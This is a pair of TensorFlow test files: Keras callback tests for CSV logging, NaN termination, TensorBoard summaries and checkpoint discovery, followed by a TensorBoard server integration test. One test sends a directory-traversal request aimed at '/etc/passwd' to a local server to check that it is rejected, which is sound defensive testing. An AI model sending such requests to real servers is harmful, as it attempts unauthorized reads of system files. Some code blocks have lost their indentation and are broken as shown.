          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=0)

      with open(filepath) as csvfile:
        list_lines = csvfile.readlines()
        for line in list_lines:
          # Each row: header or data with 5 columns -> 4 separators.
          assert line.count(sep) == 4
        # 1 header + 4 data rows (1 + 1 + 2 epochs across the three fits).
        assert len(list_lines) == 5
        output = ' '.join(list_lines)
        # The header ('epoch' column) must appear exactly once despite the
        # append and the callback reuse.
        assert len(re.findall('epoch', output)) == 1
      os.remove(filepath)
  def test_stop_training_csv(self):
    # Test that using the CSVLogger callback with the TerminateOnNaN callback
    # does not result in invalid CSVs.
    np.random.seed(1337)
    tmpdir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
    with self.cached_session():
      fp = os.path.join(tmpdir, 'test.csv')
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
      model = keras.models.Sequential()
      for _ in range(5):
        model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
      model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
      model.compile(loss='mean_squared_error',
                    optimizer='rmsprop')

      def data_generator():
        # Yields real batches until roughly 3 passes over the training data
        # have been consumed, then switches to all-NaN batches so that
        # TerminateOnNaN fires mid-training.
        i = 0
        max_batch_index = len(x_train) // BATCH_SIZE
        tot = 0
        while 1:
          if tot > 3 * len(x_train):
            yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
                   np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
          else:
            yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
                   y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
          i += 1
          tot += 1
          i %= max_batch_index

      history = model.fit_generator(data_generator(),
                                    len(x_train) // BATCH_SIZE,
                                    validation_data=(x_test, y_test),
                                    callbacks=cbks,
                                    epochs=20)
      loss = history.history['loss']
      # Training ran past epoch 1 and was terminated by a non-finite loss.
      assert len(loss) > 1
      assert loss[-1] == np.inf or np.isnan(loss[-1])
      values = []
      with open(fp) as f:
        for x in csv.reader(f):
          # In windows, due to \r\n line ends we may end up reading empty lines
          # after each line. Skip empty lines.
          if x:
            values.append(x)
      assert 'nan' in values[-1], 'The last epoch was not logged.'
  def test_TerminateOnNaN(self):
    """TerminateOnNaN stops training in the very first epoch once the loss
    blows up to inf.
    """
    with self.cached_session():
      np.random.seed(1337)
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      cbks = [keras.callbacks.TerminateOnNaN()]
      model = keras.models.Sequential()
      # Huge constant initial weights drive the loss to overflow immediately.
      initializer = keras.initializers.Constant(value=1e5)
      for _ in range(5):
        model.add(
            keras.layers.Dense(
                2,
                input_dim=INPUT_DIM,
                activation='relu',
                kernel_initializer=initializer))
      model.add(keras.layers.Dense(NUM_CLASSES))
      model.compile(loss='mean_squared_error', optimizer='rmsprop')
      history = model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=20)
      loss = history.history['loss']
      # Only one of the requested 20 epochs ran, and its loss is inf.
      self.assertEqual(len(loss), 1)
      self.assertEqual(loss[0], np.inf)
  @unittest.skipIf(
      os.name == 'nt',
      'use_multiprocessing=True does not work on windows properly.')
  def test_LambdaCallback(self):
    """A LambdaCallback's `on_train_end` hook runs after training completes."""
    with self.cached_session():
      np.random.seed(1337)
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      model = keras.models.Sequential()
      model.add(
          keras.layers.Dense(
              NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
      model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
      model.compile(
          loss='categorical_crossentropy',
          optimizer='sgd',
          metrics=['accuracy'])
      # Start an arbitrary process that should run during model
      # training and be terminated after training has completed.
      e = threading.Event()

      def target():
        # Blocks until the on_train_end hook sets the event.
        e.wait()

      t = threading.Thread(target=target)
      t.start()
      cleanup_callback = keras.callbacks.LambdaCallback(
          on_train_end=lambda logs: e.set())
      cbks = [cleanup_callback]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=5,
          verbose=0)
      # If on_train_end fired, the event released the thread and join returns.
      t.join()
      assert not t.is_alive()
  def test_RemoteMonitorWithJsonPayload(self):
    """RemoteMonitor with `send_as_json=True` completes a training run with
    the HTTP POST mocked out.
    """
    if requests is None:
      self.skipTest('`requests` required to run this test')
    with self.cached_session():
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.np_utils.to_categorical(y_test)
      y_train = keras.utils.np_utils.to_categorical(y_train)
      model = keras.models.Sequential()
      model.add(
          keras.layers.Dense(
              NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
      model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
      model.compile(
          loss='categorical_crossentropy',
          optimizer='rmsprop',
          metrics=['accuracy'])
      cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
      # Mock requests.post so no real network traffic is attempted.
      with test.mock.patch.object(requests, 'post'):
        model.fit(
            x_train,
            y_train,
            batch_size=BATCH_SIZE,
            validation_data=(x_test, y_test),
            callbacks=cbks,
            epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
  """Read all summaries under the logdir into a `_SummaryFile`.

  Args:
    logdir: A path to a directory that contains zero or more event
      files, either as direct children or in transitive subdirectories.
      Summaries in these events must only contain old-style scalars,
      images, and histograms. Non-summary events, like `graph_def`s, are
      ignored.

  Returns:
    A `_SummaryFile` object reflecting all summaries written to any
    event files in the logdir or any of its descendant directories.

  Raises:
    ValueError: If an event file contains an summary of unexpected kind.
  """
  result = _SummaryFile()
  for (dirpath, dirnames, filenames) in os.walk(logdir):
    del dirnames  # unused
    for filename in filenames:
      # Only TensorFlow event files are considered.
      if not filename.startswith('events.out.'):
        continue
      path = os.path.join(dirpath, filename)
      for event in summary_iterator.summary_iterator(path):
        if not event.summary:  # (e.g., it's a `graph_def` event)
          continue
        for value in event.summary.value:
          tag = value.tag
          # Case on the `value` rather than the summary metadata because
          # the Keras callback uses `summary_ops_v2` to emit old-style
          # summaries. See b/124535134.
          kind = value.WhichOneof('value')
          # Map the proto oneof field name to the destination set.
          container = {
              'simple_value': result.scalars,
              'image': result.images,
              'histo': result.histograms,
              'tensor': result.tensors,
          }.get(kind)
          if container is None:
            raise ValueError(
                'Unexpected summary kind %r in event file %s:\n%r'
                % (kind, path, event))
          elif kind == 'tensor' and tag != 'keras':
            # Check for V2 scalar summaries, which have a different PB
            # structure.
            if event.summary.value[
                0].metadata.plugin_data.plugin_name == 'scalars':
              container = result.scalars
          container.add(_ObservedSummary(logdir=dirpath, tag=tag))
  return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
  """Tests for the V2 `keras.callbacks.TensorBoard` summary output."""

  def setUp(self):
    super(TestTensorBoardV2, self).setUp()
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')

  def _get_model(self):
    """Return a small compiled conv net for (10, 10, 1) inputs."""
    layers = [
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1)
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
    opt = gradient_descent.SGD(learning_rate=0.001)
    model.compile(
        opt,
        'mse',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model

  def test_TensorBoard_default_logdir(self):
    """Regression test for cross-platform pathsep in default logdir."""
    # Restore the original working directory afterwards so the chdir below
    # does not leak into subsequently-run tests in the same process.
    original_cwd = os.getcwd()
    self.addCleanup(os.chdir, original_cwd)
    os.chdir(self.get_temp_dir())

    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard()  # no logdir specified

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(logdir='.')
    train_dir = os.path.join('.', 'logs', 'train')
    validation_dir = os.path.join('.', 'logs', 'validation')
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_basic(self):
    """Epoch-level loss scalars are written for train and validation."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_across_invocations(self):
    """Regression test for summary writer resource use-after-free.

    See: <https://github.com/tensorflow/tensorflow/issues/25707>
    """
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    # The same callback object is reused across two fit() invocations.
    for _ in (1, 2):
      model.fit(
          x,
          y,
          batch_size=2,
          epochs=2,
          validation_data=(x, y),
          callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_no_spurious_event_files(self):
    """Without validation data, only the 'train' run directory is created."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        callbacks=[tb_cbk])

    events_file_run_basenames = set()
    for (dirpath, dirnames, filenames) in os.walk(self.logdir):
      del dirnames  # unused
      if any(fn.startswith('events.out.') for fn in filenames):
        events_file_run_basenames.add(os.path.basename(dirpath))
    self.assertEqual(events_file_run_basenames, {'train'})

  def test_TensorBoard_batch_metrics(self):
    """update_freq=1 additionally emits per-batch loss scalars."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )

  def test_TensorBoard_weight_histograms(self):
    """histogram_freq=1 emits per-weight histograms alongside the scalars."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
    model_type = testing_utils.get_model_type()

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.histograms, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
        },
    )

  def test_TensorBoard_weight_images(self):
    """write_images=True additionally renders weights as image summaries."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, write_images=True)
    model_type = testing_utils.get_model_type()

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.histograms, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.images, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
        },
    )

  def test_custom_summary(self):
    """Summaries emitted from inside a layer's call() reach the event files."""
    if not testing_utils.should_run_tf_function():
      self.skipTest('Custom summaries only supported in V2 code path.')

    def scalar_v2_mock(name, data, step=None):
      """A reimplementation of the scalar plugin to avoid circular deps."""
      metadata = summary_pb2.SummaryMetadata()
      # Should match value in tensorboard/plugins/scalar/metadata.py.
      metadata.plugin_data.plugin_name = 'scalars'
      with summary_ops_v2.summary_scope(
          name, 'scalar_summary', values=[data, step]) as (tag, _):
        return summary_ops_v2.write(
            tag=tag,
            tensor=math_ops.cast(data, 'float32'),
            step=step,
            metadata=metadata)

    class LayerWithSummary(keras.layers.Layer):

      def call(self, x):
        # Emits one custom scalar per forward pass.
        scalar_v2_mock('custom_summary', math_ops.reduce_sum(x))
        return x

    model = testing_utils.get_model_from_layers([LayerWithSummary()],
                                                input_shape=(5,),
                                                name='model')
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
    x, y = np.ones((10, 5)), np.ones((10, 5))
    model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
            _ObservedSummary(
                logdir=self.train_dir,
                tag='model/layer_with_summary/custom_summary'),
            _ObservedSummary(
                logdir=self.validation_dir,
                tag='model/layer_with_summary/custom_summary')
        },
    )

  def _strip_layer_names(self, summaries, model_type):
    """Deduplicate summary names modulo layer prefix.

    This removes the first slash-component of each tag name: for
    instance, "foo/bar/baz" becomes "bar/baz".

    Args:
      summaries: A `set` of `_ObservedSummary` values.
      model_type: The model type currently being tested.

    Returns:
      A new `set` of `_ObservedSummary` values with layer prefixes
      removed.
    """
    result = set()
    for summary in summaries:
      if '/' not in summary.tag:
        raise ValueError('tag has no layer name: %r' % summary.tag)
      # Subclassed models nest one level deeper, so strip two components.
      start_from = 2 if 'subclass' in model_type else 1
      new_tag = '/'.join(summary.tag.split('/')[start_from:])
      result.add(summary._replace(tag=new_tag))
    return result

  def test_TensorBoard_invalid_argument(self):
    """Unknown keyword arguments (here a typo'd one) raise ValueError."""
    with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
      keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
  """TensorBoard callback tests that pin the model type explicitly."""

  def setUp(self):
    super(TestTensorBoardV2NonParameterizedTest, self).setUp()
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')

  def _get_seq_model(self):
    """Return a small compiled Sequential conv net with a known input shape."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    opt = gradient_descent.SGD(learning_rate=0.001)
    model.compile(
        opt,
        'mse',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model

  def fitModelAndAssertKerasModelWritten(self, model):
    """Fit `model` with graph writing on and assert the 'keras' tag exists."""
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir,
                                         write_graph=True,
                                         profile_batch=0)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag='keras'),
        },
    )

  def test_TensorBoard_writeSequentialModel_noInputShape(self):
    """Graph summary is written for a deferred-build Sequential model."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_writeSequentialModel_withInputShape(self):
    """Graph summary is written for a Sequential model with input_shape."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_writeModel(self):
    # Renamed from the typo'd `test_TensoriBoard_writeModel`.
    """Graph summary is written for a functional-API model."""
    inputs = keras.layers.Input([10, 10, 1])
    x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
    x = keras.layers.Flatten()(x)
    x = keras.layers.Dense(1)(x)
    model = keras.models.Model(inputs=inputs, outputs=[x])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_autoTrace(self):
    """profile_batch=1 records a trace tagged with that batch number."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
        },
    )

  def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
    """The trace tag name tracks the profiled batch index."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
        },
    )

  def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
    """A profile_batch beyond the number of batches records nothing."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    # Enabled trace only on the 10000th batch, thus it should be empty.
    self.assertEmpty(summary_file.tensors)
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
  """Tests for ModelCheckpoint's pattern-based checkpoint discovery."""

  def test_get_most_recently_modified_file_matching_pattern(self):
    """The most recently written file matching the pattern is returned."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        # NOTE(review): 2s per file keeps mtimes distinct even on coarse
        # filesystems, but is slow; explicit os.utime would be faster.
        time.sleep(2)
        f.write('foo bar')
    # Ensure the files have been actually written.
    self.assertEqual(
        set([
            os.path.join(test_dir, file_name)
            for file_name in os.listdir(test_dir)
        ]), set(file_paths))
    # The last file written has the newest mtime and must win.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-1])

  def test_some_file_not_matching_pattern(self):
    """Files whose names do not match the pattern are ignored."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    # The last file ('f.baatch...') deliberately does not match the pattern.
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        time.sleep(2)
        f.write('foo bar')
    # The newest *matching* file is the second one, not the newest overall.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-2])

  def test_get_same_file_if_file_name_equals_pattern(self):
    """A literal (non-template) path that exists is returned as-is."""
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    with open(file_path, 'w') as f:
      f.write('foo bar')
    self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        file_path)

  def test_get_none_if_file_does_not_exist(self):
    """A literal path with no file on disk yields None."""
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    self.assertLen(os.listdir(test_dir), 0)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        None)

  def test_using_checkpoint_management_latest_checkpoint(self):
    """`checkpoint_management.latest_checkpoint` takes priority over mtimes."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
    ckpt_file_name = 'f.batchXepochY'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
    with open(ckpt_file_path, 'w') as f:
      f.write('dummy ckpt')
    # Register the dummy file as the "latest checkpoint" in the
    # checkpoint state proto.
    checkpoint_management.update_checkpoint_state_internal(
        test_dir, ckpt_file_path)
    file_paths = [
        os.path.join(test_dir, file_name)
        for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        f.write('foo bar')
    # The result returned from checkpoint_management.latest_checkpoint takes
    # priority, so even if it was written earlier, we should still return that.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        ckpt_file_path)
# Standard TensorFlow test-harness entry point.
if __name__ == '__main__':
  test.main()
|
application_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard.backend import application
class TensorboardServerTest(test.TestCase):
  # Whether the generated test data serves only a MetaGraphDef; subclasses
  # presumably flip this to exercise the meta-graph code path -- confirm
  # against _GenerateTestData (defined outside this excerpt).
  _only_use_meta_graph = False  # Server data contains only a GraphDef

  # Number of scalar-containing events to make.
  _SCALAR_COUNT = 99
  def setUp(self):
    # Generate event data (helper defined outside this excerpt) and serve it
    # from a real WSGI server so tests exercise the full HTTP stack.
    self.temp_dir = self._GenerateTestData()
    multiplexer = event_multiplexer.EventMultiplexer(
        size_guidance=application.DEFAULT_SIZE_GUIDANCE,
        purge_orphaned_data=True)
    plugins = {}
    app = application.TensorBoardWSGIApp(
        self.temp_dir, plugins, multiplexer, reload_interval=0)
    self._server = serving.BaseWSGIServer('localhost', 0, app)
    # 0 to pick an unused port.
    # Daemon thread so a hung server cannot keep the test process alive.
    self._server_thread = threading.Thread(target=self._server.serve_forever)
    self._server_thread.daemon = True
    self._server_thread.start()
    # Shared connection used by _get/_getJson, bound to the chosen port.
    self._connection = http_client.HTTPConnection(
        'localhost', self._server.server_address[1])
  def tearDown(self):
    # Close the client first, then stop the serve_forever loop, then release
    # the listening socket.
    self._connection.close()
    self._server.shutdown()
    self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
  def testBasicStartup(self):
    """Start the server up and then shut it down immediately."""
    # setUp/tearDown do all the work; an empty body is the whole test.
    pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
  def testRuns(self):
    """Test the format of the /data/runs endpoint."""
    run_json = self._getJson('/data/runs')

    # Don't check the actual timestamp since it's time-dependent.
    self.assertTrue(
        isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
    del run_json['run1']['firstEventTimestamp']
    # The remaining fields must match the generated test data exactly.
    self.assertEqual(
        run_json,
        {
            'run1': {
                'compressedHistograms': ['histogram'],
                'scalars': ['simple_values'],
                'histograms': ['histogram'],
                'images': ['image'],
                'audio': ['audio'],
                # if only_use_meta_graph, the graph is from the metagraph
                'graph': True,
                'meta_graph': self._only_use_meta_graph,
                'run_metadata': ['test run']
            }
        })
def testApplicationPaths_getCached(self):
  """Application (non-data) paths should be served with a cache header."""
  for path in ('/',):  # TODO(jart): '/app.js' in open source
    # Fresh connection per path so stale keep-alive state can't interfere.
    connection = http_client.HTTPConnection('localhost',
                                            self._server.server_address[1])
    connection.request('GET', path)
    response = connection.getresponse()
